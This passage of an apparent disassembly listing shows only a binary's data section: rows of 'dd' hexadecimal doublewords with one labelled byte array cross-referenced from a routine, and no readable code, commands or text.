		dd 6BF50D9Fh, 7CC4F3D3h, 0FB01357Bh, 45F8C5BDh,	7F231C91h
		dd 0CF6FF2E5h, 0AD5DC286h, 833F5733h, 71E1B61Fh, 0A8DA8F43h
		dd 0AEAA51E6h, 77762597h, 0D59A975h, 0C508CBD2h, 7555C5BFh
		dd 483DBD93h, 0DD1F4F8h, 1E9F9EBEh, 0A23335D1h,	2B146844h
		dd 0AA765077h, 0E6BBDAE5h, 4ACC882Ch, 0A5A3CE7Ah, 349DAF53h
		dd 0D6D772ECh, 9582FFABh, 0B25B225Ch, 0EE2EE202h, 5E85A21Fh
		dd 6FCDE382h, 52BEC9EFh, 3CA56BDh, 3539C677h, 2FC596FCh
		dd 554996BBh, 7F77B155h, 5CA746A3h, 0B968327Dh,	83BB2792h
		dd 0F953A55Bh, 551018D8h, 168EF18Ah, 6DF12A0Ah,	0CD8E1D12h
		dd 40E7D16h, 0D23FE76Dh, 1CBC4CF6h, 0E229D30Ch,	0E5A51949h
		dd 9ECB0753h, 0A91B9685h, 58B80CC7h, 38272FF3h,	79FFDC78h
		dd 3A8A6200h, 612FF2EDh, 5590EA71h, 0B795DCD6h,	0B6AF5443h
		dd 7F120561h, 0CB3DE143h, 70007227h, 65778FDBh,	41DDDFAAh
		dd 0ADA1A74Bh, 325D7A88h, 8F2F5743h, 0E52C053Bh, 9CDC8B4h
		dd 222A6EA0h, 0A51ECB78h, 0E4A7F5Bh, 0B5449249h, 6D7339D4h
		dd 0C1760116h, 87CD7563h, 5A32FC81h, 2FEE80ABh,	0E31CFCEBh
		dd 32C5BD81h, 0DFBC37Dh, 39ABCE4Ch, 0FBC19A48h,	0FAD690F3h
		dd 0F1F28BAEh, 0E5B55581h, 0B43F00D2h, 0D21D7CA0h, 4BC96CFCh
		dd 0A8D6E25Ah, 0E8975248h, 0D765975Eh, 37F8F348h, 9B25F8DAh
		dd 0BC0A1AF3h, 0C289BE91h, 0C2E0975Ah, 4B86C9D7h, 0AEE57939h
		dd 0A407CECAh, 0DD3A5CD1h, 0CADB0F63h, 77CEB219h, 79043B26h
		dd 3637225Dh, 93AA1002h, 8EE70B52h, 7A8E53C8h, 65EBA911h
		dd 809272D1h, 0FCA4F0BAh, 18086A78h, 47875B7Ah,	0B183E2C3h
		dd 0FB41CB0Dh, 0A02AE7FFh, 3A96D429h, 3BA2758h,	0D3D717A0h
		dd 39D7FE20h, 19524FDAh, 0EEBBFF76h, 0E474C0D5h, 6A884BB9h
		dd 65EDAB94h, 0A1DD30F6h, 0CCB9B479h, 8EDD8C4Eh, 9E6CCFECh
		dd 0A6358804h, 1DB8A079h, 0E6032552h, 0ED8BDA5Bh, 0ECDD245Fh
		dd 41AF9D5Dh, 740A13A0h, 3B63A662h, 643DAC78h, 7F4E353Bh
		dd 9A179EEEh, 9455DEFBh, 0D68A23A1h, 0E6B6D00h,	0EF5FC3F8h
		dd 78A1454h, 3F65173Bh,	0A050EF63h, 583E4214h, 16AAD4Ah
		dd 0A16D7E9Ch, 6ECBFFF7h, 4B8BC4EDh, 80D8009Eh,	9D7487C9h
		dd 0B1270387h, 1EC71617h, 0D3F25C3Eh, 8A94B2A2h, 0F24CA983h
		dd 0A562A4AFh, 746DE607h, 0BB1E89D8h, 34CA486Ah, 0B30308C0h
		dd 0F444B2EBh, 28484F29h, 4CEF6DC6h, 520FF677h,	846EDF8Eh
		dd 8847F696h, 85A004B2h, 0F76D8AA4h, 642A1414h,	31B47688h
		dd 0AF94BEB4h, 0E1685F02h, 0BD9965CEh, 0E7CDE6E7h, 55D500D5h
		dd 0AA6C717Eh, 4DC22265h, 8B6635E9h, 3749D7B6h,	265E9BC8h
		dd 0A20BF449h, 0FA847F35h, 22D60E0Fh, 0B8BA30DCh, 520C0575h
		dd 20CCF5A2h, 0E9E50F70h
		dd 4C873CDBh, 0B44616ADh, 0A9D8E2A5h, 0CE7A856Ch, 38221F19h
		dd 204C1EBAh, 0D8B8AE69h, 2EE3FC64h, 1F47ACC2h,	337FF0A9h
		dd 6A9BABD8h, 3623C5F1h, 3D8174D5h, 159DCAB4h, 8BC4E274h
		dd 4D12458Eh, 0AFE28678h, 0A91B0375h, 2AF2DF50h, 0B6EE813Bh
		dd 0AC40F37Dh, 4D24DD3h, 0A3DF6ABEh, 46A7E9B5h,	7DF00269h
		dd 2A87EBE3h, 0DDD6693Bh, 0DE8FE34Dh, 45D8F34Ah, 2E5B16E5h
		dd 58987CE0h, 822DF42Ah, 0C3CDFBAAh, 0DE7ECABAh, 0D93ABEA3h
		dd 311F843h, 0E492A420h, 0CAF898EBh, 0FC5A7B7Eh, 158154D3h
		dd 7891367Ah, 5B7CFBDCh, 7E54F240h, 3F52842Dh, 164A2DB1h
		dd 411FAF5Dh, 0AAEA285h, 0BD9337CFh, 5A23A184h,	0CC71282h
		dd 9DE69285h, 75755394h, 80BEE17Dh, 294A15E8h, 0EE33FBCBh
		dd 55E29BACh, 0C0F02395h, 1E459717h, 44DF506Bh,	0F928989h
		dd 3C1EC580h, 0EFD3C6B3h, 9B101C5Fh, 0FD7C87E1h, 7A976E66h
		dd 86CC156Dh, 6254B26Ch, 24EC7F4Eh, 0C8208A3Bh,	718E50A5h
		dd 0B9F96269h, 77DB5450h, 0F0E77762h, 242E59B4h, 1D1A715Ah
		dd 0C2A8B1F9h, 7DAAD1ADh, 6A7A10D3h, 0E85FA92Eh, 1DB21434h
		dd 0ED4BF956h, 0C5F01AE7h, 0A17A6D9Fh, 43936B0Eh, 0C5F501ACh
		dd 468C0FC0h, 3EBF4377h, 0FAAC02B7h, 0E5F981E0h, 37EA87A4h
		dd 86FE3BD8h, 54E7DEDCh, 3AD9BB84h, 66D3A618h, 17F9DF5Ch
		dd 0B9E8F7B7h, 7C00C2E3h, 102892BEh, 0D8580902h, 2FB4B51h
		dd 0A3339D0Ah, 0EE915037h, 0FB449DF3h, 0BF2EAA59h, 0D6A09FE0h
		dd 0F6E426CFh, 816FA43h, 0EC29783Eh, 40CB2EABh,	2BDB528Eh
		dd 72ECFF0Ah, 19D3F7F7h, 0C5893AD4h, 814FD852h,	97BFB9F3h
		dd 0F570765Ah, 0C2179B33h, 0D84978EFh, 3709DF74h, 4CFA4FF7h
		dd 0FD6599E6h, 3F888AE7h, 0AF4EA257h, 962313CAh, 2261D8A8h
		dd 74E92905h, 529E5761h, 0B30E387Ch, 0ED676420h, 0DB135381h
		dd 0ED0CDA36h, 8AFAB6AEh, 935A9D4Ah, 489E5AC3h,	0D0ADA3A5h
		dd 0E0BCE078h, 0F838457Eh, 679EAC2Bh, 0F6D039FDh, 0C3B71CA9h
		dd 97C260CDh, 8E52ADEEh, 5649CF8Dh, 0D7829554h,	193F8461h
		dd 3BFB15Bh, 287DDA9Eh,	62F10C71h, 3CF4967h, 39745343h
		dd 8FCEFB76h, 17CE0CE9h, 423196FBh, 0E2F43CF5h,	0F73F305Fh
		dd 0A5F05A1Ch, 0C201CFBCh, 0AC0FBEE5h, 2236C57h, 0F98934Fh
		dd 0C23594F3h, 564BF94Ah, 61E6920Ch, 80573855h,	0B4419D51h
		dd 15A74F2Ch, 0F3ADDD9h, 0C3CEF1CCh, 0AE46D57Fh, 6665CBFDh
		dd 4BA838C6h, 798D2D19h, 7A8031C6h, 0E7C24E7Dh,	92234168h
		dd 94E2D7A3h, 1E0A6E77h, 0D100986Fh, 352BA6FAh,	7997C274h
		dd 0C9F4F0BFh, 231E8FAh, 51D5184Fh, 0F5E42F95h,	308C283Ah
		dd 0D8D6B5D4h, 0AA1E1812h, 0B3C27239h, 0B332C28Dh, 26C4F074h
		dd 5CE2FB8Bh, 2CAA9043h, 2897A02Bh, 82982551h, 0A5E7B6F2h
		dd 1CA664CFh, 353E57BBh, 54B8C33Ah, 0CAFDB322h,	0BF17900Ah
		dd 0F779FC3Fh, 0A0D6DDEh, 0DA34D767h, 569923FCh, 0AA8732CBh
		dd 357CB8EFh, 0EE48C84Ah, 0DD7052ACh, 61B183AFh, 0A4C1B450h
		dd 0CDF29F92h, 0A1D189CEh, 0EF9CA86Ch, 0C2D57942h, 19253CFEh
		dd 3ED58ECEh, 0DCE272B3h, 4FBB42D1h, 9C2837B3h,	0F35FD573h
		dd 0A5FBCDEAh, 29A651E4h, 0A4517BAAh, 25E52AE0h, 0B875EB8Ah
		dd 0BD469CEBh, 867530DAh, 806ADF61h, 0C5D1CFDDh, 0EB2351B4h
		dd 9ED87B0Eh, 3809C5C0h, 652980Dh, 0A8EADACAh, 7A8224A7h
		dd 16558854h, 0EFB77719h, 64FF24DBh, 0CE02015Bh, 808D17CAh
		dd 2F91651Ah, 0AA938ACFh, 3E650D4Eh, 89A9A93Bh,	0A4A563C0h
		dd 0E41D9529h, 2BB59BE0h, 5AB9A3A3h, 0BF5F11DAh, 0F2D2268Ah
		dd 0D413CAB8h, 2D385E20h, 70E550BEh, 901E3AFBh,	2E110240h
		dd 4A3E83ADh, 0CBEA81F8h, 0E1BF3397h, 0A8EEA1CBh, 0D43CC828h
		dd 644E4717h, 477E6E4Eh, 0E45DEA59h, 786DB06Dh,	2776D655h
		dd 24AD33D0h, 5B032848h, 3E68DF4Ch, 0A568C4ECh,	24DDB53Fh
		dd 0D8CFD7D8h, 962E6571h, 14EDF8BCh, 37560F0Eh,	0E6BAAE60h
		dd 8B5B44CDh, 1C761E7Ah, 28D57CBh, 0B8AA3F0Eh, 1865EF21h
		dd 0D1BAC3E9h, 0AF02BDDAh, 0ECA5A24Fh, 0C0CCB3CFh, 147E1CAAh
		dd 6A832FDCh, 0D73A9159h, 9F3B4D71h, 3953C3E6h,	58ECC7B7h
		dd 0F88168BAh, 1178062Dh, 111C0523h, 0FE09B120h, 0F7433BBCh
		dd 0E74B1281h, 15AD70Fh, 0B1CB5181h, 4FF6FC5Dh,	8DFA8CE5h
		dd 9BD9BC93h, 9E47F03Ch, 0FBDC1CF5h, 1555FBE0h,	36C294B4h
		dd 3FC7358Ah, 0FBE961F1h, 0AF12891Ah, 45CB3A15h, 338BFFD4h
		dd 0CC7BC33Eh, 21E09F83h, 0ABD7BCA3h, 0B0C29BADh, 68EE4938h
		dd 0C0985D80h, 4A469371h, 202DD13Bh, 0B02676C1h, 3C35B778h
		dd 0DCD1BAFDh, 0CEE7EDD9h, 81D76626h, 838EA203h, 2CDC2653h
		dd 0F8FD7FEAh, 0DB907461h, 62FE85FDh, 22D2F562h, 8EC13A80h
		dd 549C7ECBh, 22A5C94h,	0A61699B1h, 0C921AA0Ch,	77FBF8A2h
		dd 59F0B701h, 0B35B65D4h, 0FA3CA56Bh, 0DAD4C438h, 0C7CC743Eh
		dd 0F3F467BAh, 0DC2AE597h, 1109233Ah, 31B8BC06h, 5D103B2Ch
		dd 2D3308ADh, 0FF1896CBh, 0DBE4FF44h, 162D1272h, 0CC6495F3h
		dd 0D247190Dh, 0F2C613CEh, 0C379BEE9h, 0D8DBE8C0h, 0D988CAD5h
		dd 0CB128136h, 0B669ED69h, 91DFAE11h, 14162607h, 187ECBC5h
		dd 0F948381Bh, 0E89B388Ah, 0DC37DDD8h, 46DEC9ACh, 0B12BAE6Bh
		dd 0F3282527h, 0DC25D9C7h, 0CE87A0C0h, 0B79AFF85h, 2ED2AF78h
		dd 0DEEA66BAh, 0C09B2295h, 607AE81Eh, 0D725DF83h, 0DB291F99h
		dd 0E4BA47A4h, 99604070h, 1DDFC99Fh, 1DFF2203h,	0C262F92Dh
		dd 0EE4D52B1h, 0AD15EF6Bh, 0B8E02480h, 0F6071B4Ch, 0A5E2D018h
		dd 0E3D5AA60h, 9D911D66h, 5F4FFE17h, 0B9ADAE74h, 22E91E8Ch
		dd 0E5B46B02h, 0DE005452h, 72557D45h, 0E49C95F2h, 0FF7906Ch
		dd 0A72D056Eh, 0E08F0DCCh, 2E4EFB79h, 5A30D308h, 1E27ECA6h
		dd 0E0DB2EAEh, 0A1C3821Eh, 281C73B9h, 0A8DA68F7h, 77A71177h
		dd 557FEF70h, 0BB238DCCh, 4876089Ah, 0CA59EF2Ch, 0DFCFA9F8h
		dd 0B8607E0Ch, 0AE27BB93h, 457DDE8Ah, 7FE784DBh, 4ED7ACDBh
		dd 644BE8F1h, 52647580h, 48A28551h, 18BFF5EDh, 72CC627Ch
		dd 478F41D2h, 0F38CACh,	9EEDD438h, 0A0830A5Ah, 527C22Ah
		dd 0DB8D3AD0h, 5A25BF92h, 8E1F0B99h, 8FF2BE1Ch,	0C39803D3h
		dd 0BEDAFF34h, 62F23B7Eh, 920B5B3Fh, 2CBCF85Dh,	0A7405FEFh
		dd 9450BD6Eh, 424761D6h, 0E4591436h, 98BB7C6Dh,	23126682h
		dd 0F62172A7h, 0B255FF9Eh, 0EB595767h, 628F8522h, 3C34B13Fh
		dd 0C7BAC424h, 85E85518h, 7DAAD68h, 713D3538h, 954B6CE6h
		dd 0DEE4EE8Ah, 0D6923568h, 272C5DE7h, 466D0FE5h, 310DA62Bh
		dd 6122ABB6h, 0BF38C4BAh, 0C4A3D016h, 7E33BDAAh, 1AC2B168h
		dd 0AC90275Ah, 3330F8ABh, 61160631h, 0DF604DE2h, 3F95C63Bh
		dd 0BD6899FCh, 0BFB0974Ah, 6B54A4E4h, 3A83850Fh, 0D87E99E6h
		dd 760B8F0Eh, 13C027B3h, 0E83ACC1Fh, 0AAE10B4h,	9F3EF3CCh
		dd 997EF984h, 552B6B63h, 297C3602h, 0DFE577BEh,	7E5670F7h
		dd 0EEC63F88h, 0CEBC5422h, 0DB786DB1h, 0C0FB6240h, 0DA9C9851h
		dd 0FEA0FDA9h, 0F5F6C6D2h, 0AD9BB981h, 0FC5AB914h, 0B41994B6h
		dd 0ECAA254Ah, 24EB81E3h, 5181E99h, 0BA48E54Fh,	0C76A36D9h
		dd 338E2EB7h, 61DD719Fh, 0CE6525A4h, 0C7BE0194h, 0D4625FD1h
		dd 0D23F1CE7h, 0C1757162h, 0A23D5A55h, 0DD35371Ah, 30988842h
		dd 5F1A37AAh, 3D3B4D0Ah, 3C26B5CFh, 0E758045Dh,	0B5821F86h
		dd 8A195099h, 434D5021h
		dd 0C0AB1D2Ah, 9780B486h, 14E68637h, 28D2A253h,	1F58AC25h
		dd 7A0E657Dh, 0C8F5CE3Bh, 0A05BBA1Dh, 2FBD64E8h, 0B49A9E9Ah
		dd 5155A079h, 4017AD7Dh, 1704E232h, 1ED2DB9Ah, 4A3E9442h
		dd 3F17E4C8h, 0A19FC29h, 552DF9B8h, 781DC4D1h, 0C22DEB9Bh
		dd 0D614CDAh, 0A3ABBDCDh, 5E17D9A3h, 7A717BD7h,	0C8849513h
		dd 0ECC69257h, 5B3A091Fh, 0E74327EEh, 84C253E8h, 88E2E0F9h
		dd 72BDF850h, 9014DE97h, 77DC9529h, 0FD6C7E9Ah,	0FDDA5D2h
		dd 6B6C1559h, 9949FE0Ah, 4FBFB5B0h, 53F9633Ah, 3596FAB1h
		dd 0EA39590h, 38F44896h, 59744866h, 0C1753417h,	0A1DA5AB2h
		dd 0EDF49CC8h, 0FDBC8AF5h, 7D99693Dh, 0D3052AA7h, 0F907550Bh
		dd 576B8C5Fh, 5E413B54h, 0FF28EAADh, 128CCB60h,	7FBB0E6Dh
		dd 0D3C070BFh, 0EF709265h, 0DDECC178h, 0AC4B15F8h, 0C4C7429Ch
		dd 4B45DB69h, 0DD38D622h, 567ECB15h, 0E582BE4Bh, 38B0C1C8h
		dd 0B1CBDB8Fh, 1E3CE1ECh, 3B53AB3Ch, 5D4D4454h,	0B24680AEh
		dd 6F6EA161h, 603BE18Bh, 0ABB086FAh, 0B9C35694h, 3879E162h
		dd 0BF4BF2h, 4EFD0B56h,	0F218273h, 6D7EE696h, 0CF4434FBh
		dd 0B55A6ECh, 0CD4A3C2Ah, 42AB6C5Fh, 6402C4A2h,	0F7F917C7h
		dd 0E291E36Ch, 0A83F8BF0h, 555D5EEDh, 9DD76777h, 0D5362B53h
		dd 0D9C075D8h, 0CC34E6DDh, 0FC05E33h, 4D8BD387h, 3AC979ACh
		dd 0E17042F4h, 7F075022h, 51B878B8h, 7A9F9D13h,	527BB7EEh
		dd 0B0A5D462h, 5FE8B70Eh, 93BA999Fh, 6DBB14FEh,	8E912C78h
		dd 64A7C183h, 1C1437ABh, 31867C1Eh, 7C662574h, 8CADEC35h
		dd 1123B668h, 17E044F2h, 90C98EFCh, 0C1728BD7h,	88CC7B5Fh
		dd 9B9F6306h, 537A95BCh, 242C955h, 6B5EFC73h, 0B4DA2350h
		dd 0AAC6D3E1h, 0F8B2D06Dh, 4ECA1F8h, 44FD87D6h,	532ABE31h
		dd 42AF17E1h, 0C366B32Bh, 3E2CDB7h, 1EDEE2EDh, 7EACD5EDh
		dd 791736D3h, 0B59B0055h, 0BB8F682Bh, 0A7745E26h, 6DD5CF3Bh
		dd 5CF97512h, 67F93F73h, 8C6F3F34h, 0A555D5B6h,	6F9E0E04h
		dd 2F50868Fh, 3D60A54Bh, 0FC54112Dh, 1E9978C3h,	0B75CDA3Dh
		dd 1FDF3EC6h, 0FAC6035Eh, 1B8785B9h, 0F03E2403h, 104EF643h
		dd 6BB4FC80h, 0E4EDFAA0h, 0E1BFAC2Bh, 66DD0444h, 259EC30Ch
		dd 0B5F3272Bh, 0B56E3B10h, 34740C02h, 0E3332BB9h, 0C2F0FB6Ah
		dd 4781066Eh, 0A641DCA6h, 8BED4DE0h, 0A557B5F6h, 0CED7C72Fh
		dd 5DBB98C8h, 0C0AD7143h, 80AC0AFAh, 0FC3A0B1h,	5E72A675h
		dd 0E7C5DC17h, 0DDC237ABh, 1A4469B2h, 4D6207DDh
		db 63h
byte_4754FD	db 0FFh, 4Eh, 6Ch	; DATA XREF: sub_43D7A9:loc_454021o
		dd 0F6DE676Fh, 5E85BA7Fh, 23A54755h, 0AF6D6B47h, 0AAA54310h
		dd 0ED7FBB46h, 24F888BCh, 30BB1A00h, 2D5AE85Ah,	0CE2918EEh
		dd 0DA1F4CBFh, 7B750E6Dh, 42AAA816h, 4A975D7Dh,	0BF068321h
		dd 425AEEAEh, 0D997565Ch, 0AB90B83Ah, 0C2EE38B2h, 6EFB884Bh
		dd 1565B4E1h, 6F1AE8E5h, 56D45E25h, 5DE2ED1Dh, 0B1F3C949h
		dd 95451F8Ch, 540511B4h, 3A32BEECh, 0D9085E83h,	0A5458DCFh
		dd 9EEC153Fh, 19F85D5Ah, 0B59FF175h, 0A0A1BC5h,	56276486h
		dd 0AC7B25Bh, 0E91D9C1Fh, 0B1330762h, 586B995Ah, 558D939Eh
		dd 756091EDh, 5D45E4F7h, 0C54679F5h, 0A8297379h, 0BE5799A8h
		dd 2CD20444h, 0B18B8755h, 0D4206AA7h, 0A637F7DAh, 0F09E6865h
		dd 0ACCAC695h, 686F908Ch, 5C9260A9h, 2FDBE7Eh, 78579607h
		dd 27EB0CEAh, 5F18B96Ch, 58BE732Eh, 0DFD8AA35h,	0ABB472D1h
		dd 0E173EAB2h, 0C1E0B145h, 0DA951A0Ch, 239B3748h, 6A2E677Bh
		dd 68E2559Ah, 75B662ADh, 965EE86Fh, 0AD88BCAEh,	345EF625h
		dd 0CB8329AFh, 52A4E16Dh, 0C2D06FDFh, 1E11CD9Fh, 0DF33F93Dh
		dd 8E579F15h, 0D752C16h, 26F96BCFh, 0B637B9EBh,	0FA5D7FB8h
		dd 0D5596815h, 0E6FA9667h, 0F072D4B6h, 0E1F8D927h, 6819B870h
		dd 99A9FEF6h, 94292A60h, 774E23E5h, 8D295585h, 14CAC149h
		dd 0FA99906Ah, 9BFEF3D5h, 51573FD2h, 867E261Fh,	0F0EBBF8Dh
		dd 0BDE0B381h, 38CD3093h, 0A4F328C8h, 40BF2673h, 0F7EE6AC5h
		dd 0C263DAF3h, 7F526800h, 994A4C33h, 6E639AADh,	0F3ABC31Fh
		dd 8F63471Ah, 0EE4C81A3h, 6D518516h, 0D284BEC1h, 4A0CD7ACh
		dd 0F964AD1Dh, 9B95CFB2h, 0B75F5DEAh, 20F8483Ah, 6853B473h
		dd 0BB6ADCD0h, 49173E18h, 0D247B0DEh, 7ABEA56h,	8C81C3FAh
		dd 0E4AF02DBh, 6BAFD762h, 0F94370E0h, 6DF41157h, 0D629BB80h
		dd 46F3C4BAh, 573CB45Dh, 0C34C966h, 0A8BA8CC2h,	0A655E44Ah
		dd 0DA099908h, 3741AAB2h, 2F6FF53Fh, 2D8C22E3h,	0FA20DE05h
		dd 0D3557651h, 0B0ADFB9Fh, 1D7B7BD0h, 43AEA6DEh, 0A028205Fh
		dd 1E07CC50h, 25849DFEh, 0A33185B0h, 0DAD755E0h, 21207D92h
		dd 0C8574EF3h, 119283BAh, 0E26AEF6Eh, 0EEEE4F2Bh, 0E94248B4h
		dd 90C16ACAh, 7CEE807Bh, 1FDF6723h, 7A440928h, 5576A2EEh
		dd 0DD8688C6h, 1A6E4045h, 9CA06256h, 6C062E0Bh,	0F342E80h
		dd 0F63E9D2Eh, 2518F898h, 0E6DB4A7Ah, 0AF4AF29Ch, 50900738h
		dd 0FD1ADA74h, 69EE8571h, 198C3F95h, 6360D625h,	0D0703926h
		dd 33BB88Dh, 7BCD2FE3h,	1FF534DCh, 6CA4A30Bh, 6DFCE09Ch
		dd 65E32D38h, 0F9FD1345h, 9A2F45ABh, 0E6FA5D33h, 11B73EDDh
		dd 0E4E564A2h, 760DD15Ah, 0B7DF9AACh, 0CA291C9Eh, 9E22CCE8h
		dd 0BDC6F470h, 3AF5A5D0h, 4A36F3DBh, 3F422AF0h,	2EC2F1DAh
		dd 0A2FEF084h, 6BB2458Ah, 6595C136h, 0B1F475D9h, 4A6CD112h
		dd 1F9496F4h, 0A7DCAD1h, 0BF67DF28h, 5179D659h,	0F8022CA0h
		dd 976BCFFEh, 650B7167h, 0BD0E6029h, 0B6A7C3F1h, 0CAE4EBD5h
		dd 0A1709C82h, 52871755h, 0E30F1AA8h, 6EF2C33Dh, 8EAEE257h
		dd 0CF6BED50h, 78316993h, 0F371E427h, 15DDD5A7h, 0FD2AB613h
		dd 0DF63F5Bh, 0E19FA503h, 0AAB8795Dh, 178F5D82h, 9F381AE4h
		dd 20EFAD84h, 83B3B1D1h, 3C74FA94h, 445A56EFh, 1FCEBFBBh
		dd 0F5E17B7Ah, 0BF103DC7h, 4576030Eh, 169DC630h, 0FAA02F1Dh
		dd 0D4D29FE2h, 9F4D5138h, 3BDAE04Ah, 0B86279A2h, 0EC1569FEh
		dd 452397BBh, 0E69B325Ch, 0A68D40CBh, 19E73EC7h, 0C077A6DBh
		dd 88E9C3C0h, 0AC86AFh,	0FC567A0h, 7FB0471Fh, 3DD27A94h
		dd 2FE33C3Bh, 7FB1B7D2h, 0A8EDEA5Ah, 48D7C030h,	0BE6EFD12h
		dd 0D4C6EE8Ah, 554AB1FFh, 0E39AA87Dh, 4A658683h, 0E18E5884h
		dd 0A57BD9Ch, 276AD4E7h, 91473009h, 676B4DBEh, 387DC153h
		dd 19607205h, 3F8B15D6h, 34FB0C88h, 5240AC0Ah, 63DB23A8h
		dd 42798233h, 0B11444FFh, 0D7FC4B3Eh, 0C0333335h, 5E8D0EB8h
		dd 4822E506h, 4A9159AEh, 27D9859h, 796FBBA5h, 0DDE7A194h
		dd 0D086CE06h, 0F9001A1Fh, 0F757CD5Dh, 89FB78D6h, 0E04F30E0h
		dd 23C2CB73h, 7C99E555h, 4BC5495h, 68EE49ADh, 19A0CAAFh
		dd 0F5DFC1F3h, 0ABB8DA9h, 0DDC129ECh, 23504335h, 64D15A0Fh
		dd 2A8518D8h, 2C7CB0FAh, 0CDF5A393h, 0A9DA1A49h, 2B1F5ABAh
		dd 0AB6E2E52h, 0A3BB3226h, 8A4DD78h, 0E896C2A9h, 6E6969E5h
		dd 0DD527960h, 51EC3648h, 0DEE7723Eh, 92620C47h, 0D982085Fh
		dd 0BFB8FB2Dh, 0AE278F4Bh, 0C3AAA87Dh, 43CB9CCFh, 29FCB6EAh
		dd 0AD06BE8Bh, 0D212C32Ah, 0D442CAF0h, 1DD79E7Dh, 45B4CD6Ch
		dd 0D4F7230Bh, 880E88FFh, 4B2A98B9h, 0BA3D62Dh,	0AF7D13EBh
		dd 8BD6E587h, 234C28C0h, 66F6823Ch, 0DCD868A9h,	9660405Dh
		dd 0A553A5AFh, 7F0E4BDDh, 0B5A0DD31h, 0F3730BF3h, 0EBEE97E0h
		dd 0BA3A97DAh, 52A4578Fh, 0D2B666B6h, 0F2EFE1C2h, 93B0004Bh
		dd 0D78888E9h, 0FAEA2A43h, 0A071B7BAh, 227FF54Ch, 357009A7h
		dd 0BFCCAC5Eh, 9E04D3Fh, 0EF2DAAABh, 0B40A58DAh, 7B1FCC4Ch
		dd 0EEA9B9A3h, 3BBAD3B8h, 90796896h, 5C0DBE17h,	2CE72EBDh
		dd 3C893751h, 6C5F4DF7h, 83FDED3Bh, 1396D71Fh, 0EFF2ECEBh
		dd 0B346F2Ch, 4F4787ABh, 4EDADC05h, 7C0FAC25h, 91EB116Dh
		dd 9CCFB017h, 0A6A04C30h, 0F020B46Fh, 28E9B568h, 0AA09FEF5h
		dd 3E2C6A42h, 259A4B9Ch, 15B3735h, 77C915E1h, 0EDA04757h
		dd 0D462A66Bh, 0FC36D3C0h, 23D1E330h, 0ED81F8DDh, 0E8175EAh
		dd 66219313h, 667FF394h, 8D1A5D29h, 0B05683C2h,	7359E56Ch
		dd 12087E59h, 758A9BCDh, 0D5C6AAB2h, 61AADFC6h,	6684BE9h
		dd 0EA95BBBDh, 0BF3DB1D1h, 9546ABFAh, 0B9CF116Ch, 9C2A6AA0h
		dd 0ADA552F4h, 0EFF4820Dh, 3658D6DDh, 0D6FCD567h, 0E6B54768h
		dd 7C89F9E1h, 3C889EA1h, 0C352F2B0h, 29183FCEh,	0A53070Ch
		dd 86F5C9B5h, 0AB74A0D1h, 16E97FE5h, 0D72FB03Ah, 0FBFB3DC8h
		dd 90751602h, 63315AA0h, 0E355603h, 0EADC7398h,	84973202h
		dd 1F7528BBh, 0A67FBDDh, 5C543190h, 0EF135B7Ch,	159ACDCDh
		dd 1A67A417h, 319F1AF1h, 40706FA7h, 70DC3DE8h, 0D0C07D70h
		dd 53DCD7C9h, 0C21FA36h, 7AA4E7B0h, 73134EAEh, 8B31D324h
		dd 0DAB266E1h, 0BF47C9FEh, 0EA592A38h, 625F889Ch, 0E0D54A07h
		dd 0CAD5A9CAh, 0A16547B2h, 6D3DD4D9h, 0D9F8DD73h, 0BF4BE4AFh
		dd 106AF17Fh, 6A5B5EDFh, 70814936h, 202B157Fh, 0A04AC5A0h
		dd 0A85A1A9Eh, 1B2EC997h, 0BC253F1Eh, 0B6C94571h, 46AE8DAFh
		dd 0FF89E0A3h, 0D7BF9B42h, 94F65CD7h, 0A9D079Ah, 0F4D807DFh
		dd 7DFBEE1h, 9BF74A3Fh,	0CFB40703h, 971679ACh, 0B453FD10h
		dd 7C1D3D5Dh, 6BC57ADEh, 0B9A6038h, 7FEE30Ah, 36C7CF37h
		dd 44B8AE2Fh, 220FBE35h, 67167B35h, 0F1CC949Eh,	14C055EEh
		dd 29C251F1h, 47D2552Ah, 55A05A71h, 0DA7FE1B8h,	3E8512C9h
		dd 0D0DD70F5h, 617F3CB5h, 0FB5FB7E3h, 0CE408C0Fh, 8F5B2C98h
		dd 43D7D781h, 0CE8A52B7h, 3CEC574h, 6B2AB517h, 0D6B1A570h
		dd 0C73DD5B7h, 0C38268CAh, 3D96B8F5h, 0F26CB7CEh, 0A5A52FF2h
		dd 0AFB2620Ah, 0F16AA8D5h, 1FD32A54h, 40F6F5EDh, 0D7F5A8B2h
		dd 0F93AAD1Eh, 0CCE353DEh, 692C84B6h, 0ADA3FF87h, 1FCAFC3Fh
		dd 9B5B54EDh, 0CE0DEDDFh, 0D82A045Fh, 0FA976FF4h, 81F34F21h
		dd 0BB5DE387h, 0E4EFEA6Ch, 23039288h, 0D75E259Dh, 3997E3D7h
		dd 0CDAFE7BAh, 5B937EF2h, 0E5182519h, 1D0C2855h, 1333CD67h
		dd 14535C0Fh, 9B5C85F6h
		dd 68112B39h, 71C2F425h, 0AAA945D0h, 0E8565019h, 2B4E7181h
		dd 156D1F1h, 0C2F1AB56h, 0BD6E2DACh, 0DAC8CF60h, 0D9DFC149h
		dd 103607Dh, 371C471Bh,	0D8C0D7E5h, 93F0B53h, 96CA7C44h
		dd 0AE2A7321h, 0E8C93018h, 0E8F1AE93h, 0ABEEA593h, 0D1454355h
		dd 4EBCB828h, 1C89DE12h, 55F5DDD0h, 9E2FFEF5h, 7C6A1F4Bh
		dd 6163111Ch, 0FC424F36h, 583AF31Bh, 0D2E507D8h, 71242522h
		dd 0C3B73F34h, 0CEE37761h, 4EFDC259h, 64F3B662h, 93A9ED7Ch
		dd 10A692Ah, 1839F3ABh,	82B2BE0Ch, 60A7E3BEh, 68E4A972h
		dd 9A980031h, 0E95DABEDh, 0AF6899FEh, 0AD58EDB2h, 0E7D5DA6Ah
		dd 9E40019Ch, 9B14AD38h, 1F8F2EDDh, 0A2C0C360h,	7B7B520Bh
		dd 0E326F1A7h, 6929EF1h, 5B9DC348h, 25306B71h, 0D7752057h
		dd 0EABBD265h, 7752E081h, 42EADF05h, 0BAA95540h, 0BEB0CCB7h
		dd 0F6F8473Eh, 2AF7C1DFh, 9FF75540h, 0B921EB01h, 1AE9DE52h
		dd 12C67D6Dh, 0F227F0BBh, 665ACE44h, 0B07D5155h, 6397180Eh
		dd 86C2E70Ch, 0B538AAEAh, 60591F8Ah, 2617777Ch,	0EC63896Fh
		dd 0A3DBCA77h, 33AFC11Ch, 115936E1h, 949A9C36h,	12D49838h
		dd 0F30E9338h, 0AA1EBF6Dh, 429C96EFh, 8E865DDFh, 2FC1C15Ah
